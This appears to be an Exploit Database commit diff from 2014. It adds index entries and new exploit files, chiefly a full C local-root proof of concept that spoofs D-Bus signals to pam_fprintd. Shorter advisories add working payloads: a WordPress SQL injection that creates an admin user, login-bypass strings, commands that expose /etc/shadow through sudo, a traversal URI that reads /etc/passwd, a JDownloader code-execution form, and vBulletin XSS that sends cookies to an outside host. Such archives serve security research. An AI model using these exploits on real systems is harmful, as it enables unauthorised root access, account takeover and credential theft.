Updated 06_04_2014

files.csv

@@ -30282,3 +30282,16 @@ id,file,description,date,author,platform,type,port
 33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 Remote Denial Of Service Vulnerability",2010-02-07,"599eme Man",windows,dos,0
 33610,platforms/windows/remote/33610.py,"Easy File Management Web Server v5.3 - UserID Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80
 33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 Remote Directory Traversal Vulnerability",2010-02-08,Markot,windows,remote,0
+33613,platforms/php/webapps/33613.txt,"Wordpress Participants Database 1.5.4.8 - SQL Injection",2014-06-02,"Yarubo Research Team",php,webapps,80
+33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Local Root Exploit",2014-06-02,"Sebastian Krahmer",linux,local,0
+33615,platforms/multiple/remote/33615.txt,"JDownloader 'JDExternInterface.java' Remote Code Execution Vulnerability",2010-02-08,apoc,multiple,remote,0
+33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 Space String Remote File Disclosure Vulnerability",2010-02-08,"Pouya Daneshmand",multiple,remote,0
+33617,platforms/php/webapps/33617.txt,"Aflam Online 1.0 'index.php' SQL Injection Vulnerability",2010-02-08,alnjm33,php,webapps,0
+33618,platforms/php/webapps/33618.txt,"Zen Time Tracking 2.2 Multiple SQL Injection Vulnerabilities",2010-02-08,"cr4wl3r ",php,webapps,0
+33619,platforms/php/webapps/33619.txt,"VideoDB 3.0.3 'login.php' Cross Site Scripting Vulnerability",2010-02-08,vr,php,webapps,0
+33620,platforms/linux/remote/33620.txt,"Helix Player <= 11.0.2 Encoded URI Processing Buffer Overflow Vulnerability",2007-07-03,gwright,linux,remote,0
+33621,platforms/php/webapps/33621.txt,"vBulletin Adsense Component 'viewpage.php' SQL Injection Vulnerability",2010-02-09,JIKO,php,webapps,0
+33622,platforms/linux/remote/33622.txt,"Accellion File Transfer Appliance web_client_user_guide.html lang Parameter Traversal Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote,0
+33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance Multiple Command Restriction Weakness Local Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
+33624,platforms/php/webapps/33624.txt,"vBulletin <= 3.5.4 Multiple Cross Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0
+33625,platforms/php/dos/33625.php,"PHP <= 5.3.1 'session_save_path()' 'safe_mode' Restriction-Bypass Vulnerability",2010-02-11,"Grzegorz Stachowiak",php,dos,0

platforms/linux/local/33614.c

@@ -0,0 +1,161 @@
+/* darklena. fprintd/pam_fprintd local root PoC. However dbus-glib plays an important role.
+ *
+ * (C) 2013 Sebastian Krahmer, all rights reversed.
+ *
+ * pam_fprintd uses net.reactivated.Fprint service to trigger finger swiping and
+ * registers DBUS signal inside the PAM authentication function:
+ *
+ *       dbus_g_proxy_add_signal(dev, "VerifyStatus", G_TYPE_STRING, G_TYPE_BOOLEAN, NULL);
+ *       dbus_g_proxy_add_signal(dev, "VerifyFingerSelected", G_TYPE_STRING, NULL);
+ *       dbus_g_proxy_connect_signal(dev, "VerifyStatus", G_CALLBACK(verify_result),
+ *                                   data, NULL);
+ *
+ * Then, when the DBUS signal arrives, the signal argument is basically just checked
+ * to be the "verify-match" string; which however is expected to come from the legit
+ * net.reactivated.Fprint service. Since there is no message filter registered in either
+ * pam_fprintd, nor inside dbus-glib which it is using, such signals can be spoofed
+ * by anyone. In order to do so, we first need to spoof a NameOwnerChanged signal
+ * so the dbus_g_proxy_manager_filter() function inside dbus-glib will find our
+ * sender-name (which cannot be spoofed) inside its hash tables and match it to
+ * net.reactivated.Fprint.
+ *
+ * To test this PoC, start a service (su is fine) as user that is using pam_fprintd.
+ * On a second xterm, when you see 'Swipe your ... finger' message start this PoC
+ * and you will notice that a rootshell is spawned in the first xterm w/o giving your finger. :p
+ *
+ * Used various DBUS tutorials and example code, while writing this.
+ *
+ * $ cc darklena.c `pkg-config --cflags dbus-1` -ldbus-1 -Wall
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <dbus/dbus.h>
+
+
+void die(const char *s)
+{
+  perror(s);
+  exit(errno);
+}
+
+
+int main(int argc, char **argv)
+{
+  DBusError err;
+  DBusConnection *conn = NULL;
+  DBusMessage *vrfy_msg = NULL, *noc_msg = NULL, *nl_msg = NULL, *reply = NULL;
+  dbus_uint32_t serial = 0;
+  dbus_bool_t t = 1;
+  int un = 0, i = 0, reply_to = -1;
+  const char *vrfy_match = "verify-match", *cname = NULL,
+             *name = "net.reactivated.Fprint", *prev_owner = NULL;
+  char dest[32];
+
+  /* override unique name of net.reactivated.Fprint */
+  if (argc > 1)
+    prev_owner = strdup(argv[1]);
+
+  printf("\n[**] darklena, pam_fprintd PoC exploit 2013\n\n");
+
+  printf("[*] Initializing DBUS ...\n");
+  dbus_error_init(&err);
+  conn = dbus_bus_get(DBUS_BUS_SYSTEM, &err);
+
+  if (dbus_error_is_set(&err)) {
+    fprintf(stderr, "Error: %s\n", err.message);
+    die("dbus_error_is_set");
+  }
+
+  if ((cname = dbus_bus_get_unique_name(conn)) == NULL)
+    die("dbus_bus_get_unique_name");
+
+  un = atoi(strchr(cname, '.') + 1);
+
+  printf("[+] Done. Found my unique name: %s (%d)\n", cname, un);
+
+  if (!prev_owner) {
+    printf("[*] Trying to find unique name of '%s' ...\n", name);
+    nl_msg = dbus_message_new_method_call("org.freedesktop.DBus",
+                                          "/org/freedesktop/DBus",
+                                            "org.freedesktop.DBus",
+                                          "GetNameOwner");
+
+    if (!dbus_message_append_args(nl_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_INVALID))
+      die("[-] dbus_message_append_args");
+
+    reply = dbus_connection_send_with_reply_and_block(conn, nl_msg, reply_to, &err);
+    dbus_message_unref(nl_msg);
+
+    if (dbus_error_is_set(&err)) {
+      fprintf (stderr, "[-] Error: %s\n", err.message);
+      die("[-] dbus_connection_send_with_reply_and_block");
+    }
+
+    if (!dbus_message_get_args(reply, &err,
+                               DBUS_TYPE_STRING, &prev_owner, DBUS_TYPE_INVALID)) {
+      fprintf(stderr, "[-] Error: %s\n", err.message);
+      die("[-] dbus_message_get_args");
+    }
+
+    dbus_message_unref(reply);
+  }
+
+  printf("[+] Found unique name of '%s' as '%s'\n", name, prev_owner);
+
+  for (i = 1; i < 20; ++i) {
+    /* spoof a NameOwnerChanged signal */
+    noc_msg = dbus_message_new_signal("/org/freedesktop/DBus",
+                                      "org.freedesktop.DBus",
+                                      "NameOwnerChanged");
+
+    /* spoof a VerifyStatus */
+    vrfy_msg = dbus_message_new_signal("/net/reactivated/Fprint/Device/0",
+                                             "net.reactivated.Fprint.Device",
+                                             "VerifyStatus");
+
+    if (!vrfy_msg || !noc_msg)
+      die("[-] dbus_message_new_signal");
+
+    if (!dbus_message_append_args(noc_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_STRING,
+                                  &prev_owner, DBUS_TYPE_STRING, &cname, DBUS_TYPE_INVALID))
+      die("[-] dbus_message_append_args1");
+
+    if (!dbus_message_append_args(vrfy_msg, DBUS_TYPE_STRING, &vrfy_match,
+                                  DBUS_TYPE_BOOLEAN, &t, DBUS_TYPE_INVALID))
+      die("[-] dbus_message_append_args2");
+
+    /* iterate over unique names short below under our own
+     * to hit the previously started su
+     */
+    snprintf(dest, sizeof(dest), ":1.%d", un - i);
+    printf("[*] Using new destination: %s\n", dest);
+
+    if (!dbus_message_set_destination(vrfy_msg, dest))
+      die("[-] dbus_message_set_destination");
+
+    if (!dbus_message_set_destination(noc_msg, dest))
+      die("[-] dbus_message_set_destination");
+
+    if (!dbus_connection_send(conn, noc_msg, &serial))
+      die("[-] dbus_connection_send");
+
+    dbus_connection_flush(conn);
+    usleep(1000);
+
+    if (!dbus_connection_send(conn, vrfy_msg, &serial))
+      die("[-] dbus_connection_send");
+
+    dbus_connection_flush(conn);
+
+    dbus_message_unref(vrfy_msg);
+    dbus_message_unref(noc_msg);
+  }
+
+  printf("\n[**] Here comes the pain! (but no one's to too innocent to die)\n");
+  return 0;
+}

platforms/linux/local/33623.txt

@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/38176/info
+ 
+Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including:
+ 
+- Multiple privilege-escalation issues
+- A directory-traversal issue
+- An HTML-injection issue
+- A remote command-injection issue
+ 
+An attacker may leverage these issues to execute arbitrary script code within the context of the webserver, steal cookie-based authentication credentials, obtain sensitive information, and execute arbitrary code or commands with superuser privileges. Other attacks are also possible.
+ 
+The following proofs of concept are available:
+
+sh-2.05b$ ln /etc/shadow /home/admin/oldtemp
+sh-2.05b$ sudo /bin/chmod 666 /home/admin/oldtemp
+
+sh-2.05b$ ln /etc/shadow /home/admin/temp
+sh-2.05b$ sudo /bin/cp /home/admin/temp /etc/mail/sendmail.cf
+
+sh-2.05b$ sudo /usr/local/bin/admin.pl

platforms/linux/remote/33620.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38161/info
+
+Helix Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+Successful exploits may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions. 
+
+
+The following example URI is available:
+
+http://AAA.BBB.CCC.DDD:EEEE/%.20000000s%
+

platforms/linux/remote/33622.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/38176/info
+
+Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including:
+
+- Multiple privilege-escalation issues
+- A directory-traversal issue
+- An HTML-injection issue
+- A remote command-injection issue
+
+An attacker may leverage these issues to execute arbitrary script code within the context of the webserver, steal cookie-based authentication credentials, obtain sensitive information, and execute arbitrary code or commands with superuser privileges. Other attacks are also possible. 
+
+https://www.example.com/courier/1000@1276123d688676a09e0100b4f54b239c/web_client_user_guide.html?lang=../../../../../etc/passwd 

platforms/multiple/remote/33615.txt

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/38143/info
+
+JDownloader is prone to a vulnerability that lets remote attackers execute arbitrary code.
+
+Attackers can exploit this issue to execute arbitrary code within the context of the affected webserver process.
+
+Versions prior to JDownloader 0.9.334 are vulnerable. 
+
+<form action="http://www.example.com:9666/flash/addcrypted2" method="post">
+<textarea name="jk">
+function f() {
+    var run = java.lang.Runtime.getRuntime();
+    run.exec('/usr/bin/xclock');
+
+    return '42';
+}
+&lt;/textarea&gt;
+<input type="hidden" name="passwords" value="invalid" />
+<input type="hidden" name="source" value="http://example.com/invalid" />
+<input type="hidden" name="crypted" value="invalid" />
+<input type="submit" value="CLICK" />
+</form>
+
+or:
+
+http://www.example.com:9666/flash/addcrypted2?jk=function+f()+%7B+var+run+%3D
++java.lang.Runtime.getRuntime()%3B+run.exec('%2Fusr%2Fbin%2Fxclock')%3B
++return+'42'%3B+%7D&passwords=invalid&source=http://example.com/invalid
+&crypted=invalid

platforms/multiple/remote/33616.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38145/info
+
+Mongoose is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view the source code of files in the context of the server process, which may aid in further attacks.
+
+This issue affects Mongoose 2.8; other versions may be vulnerable as well. 
+
+The following example URI is available:
+
+http://www.example.com/file.php%20%20%20 

platforms/php/dos/33625.php

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/38182/info
+
+PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write session files in arbitrary directions.
+
+This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; the 'safe_mode' restrictions are assumed to isolate users from each other. 
+
+{
+
+session_save_path(";;/byp/;a/../../humhum");
+session_start();
+
+}

platforms/php/webapps/33613.txt

@@ -0,0 +1,82 @@
+Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress
+=========================================================================
+
+Program: Participants Database <= 1.5.4.8
+Severity: Unauthenticated attacker can fully compromise the Wordpress
+installation
+Permalink: http://www.yarubo.com/advisories/1
+
+— Info —
+
+Participants Database is a popular Wordpress plugin that offers the
+functionality needed to build and maintain a database of people. As of
+today the plugin has been downloaded 92,089 times.
+
+— Vulnerability details —
+
+1. Due to insufficient privilege checks it is possible for anonymous
+(unauthenticated) users to trigger some administrative actions If any of
+the shortcodes is used (e.g. signup page).
+
+2. The action "export CSV" takes a parameter called "query" that can
+contain an arbitrary SQL query. This means that an unauthenticated user can
+execute arbitrary SQL statements (e.g. create an admin user, read or write
+files, or execute code depending on the MySQL user privileges).
+
+
+— Exploit —
+
+Add a user to wordpress as follows (if you want an admin user, also add
+admin privileges to wp_usermeta):
+
+
+POST /wordpress/pdb-signup/ HTTP/1.1
+Host: www.example.com
+Content-Length: 789
+(…)
+Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN
+
+------WebKitFormBoundaryuoACADe1C2IFWMxN
+Content-Disposition: form-data; name="action"
+
+output CSV
+------WebKitFormBoundaryuoACADe1C2IFWMxN
+Content-Disposition: form-data; name="CSV_type"
+
+participant list
+------WebKitFormBoundaryuoACADe1C2IFWMxN
+Content-Disposition: form-data; name="subsource"
+
+participants-database
+------WebKitFormBoundaryuoACADe1C2IFWMxN
+Content-Disposition: form-data; name="query"
+
+INSERT INTO wp_users
+(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)
+VALUES
+(31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);
+
+------WebKitFormBoundaryuoACADe1C2IFWMxN
+
+
+
+— Solution —
+
+This issue has been fixed in version 1.5.4.9. Download the newest version
+from:
+
+https://wordpress.org/plugins/participants-database/
+
+
+— Credit —
+
+
+Yarubo Research Team
+research [at] yarubo.com
+
+Network Security Scan:
+http://www.yarubo.com/
+
+Free Heartbleed Scan:
+http://www.yarubo.com/heartbleed

platforms/php/webapps/33617.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/38147/info
+
+Aflam Online is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Aflam Online 1.0 is vulnerable; other versions may also be affected. 
+
+The following proof of concept is available:
+
+http://www.example.com/admincp
+
+username = 'or 33=33/*
+Password = Security War 

platforms/php/webapps/33618.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/38153/info
+
+Zen Time Tracking is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Zen Time Tracking 2.2 is vulnerable; other versions may also be affected.
+
+[ZenTracking_path]/managerlogin.php
+
+username: ' or' 1=1
+Password: ' or' 1=1 

platforms/php/webapps/33619.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38155/info
+
+VideoDB is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+VideoDB 3.0.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/videodb/login.php?error=%3Cscript%3Ealert%20%28%27XSS%27%29%3C/script%3E 

platforms/php/webapps/33621.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38167/info
+
+The vBulletin Adsense component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/vb/viewpage.php?do=show&id=-1%20union%20select%200,2,3-- 

platforms/php/webapps/33624.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/38179/info
+
+vBulletin is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect vBulletin 3.0.0 through 3.5.4.
+
+
+http://www.example.com/search.php?do=process&showposts=0&query = <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s. jpg? »+ document.cookie; </ script>
+
+http://www.example.com/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML =% 3Cp% 3E% 3C% 2Fp% 3E & s = & f = 3 & do = postthread & posthash = c8d3fe38b082b6d3381cbee17f1f1aca & poststarttime = &#039;% 2Bimg = new Image (); img. src = «http://antichat.ru/cgi-bin/s.jpg?» + document.cookie;% 2B &#039;& sbutton =% D1% EE% E7% E4% E0% F2% FC +% ED% EE% E2 % F3% FE +% F2% E5% EC% F3 & parseurl = 1 & disablesmilies = 1 & emailupdate = 3 & postpoll = yes & polloptions = 1234 & openclose = 1 & stickunstick = 1 & iconid = 0
+
+http://www.example.com/forumdisplay.php?GLOBALS [] = 1 & f = 2 & comma = ». System ( &#039;id&#039;).»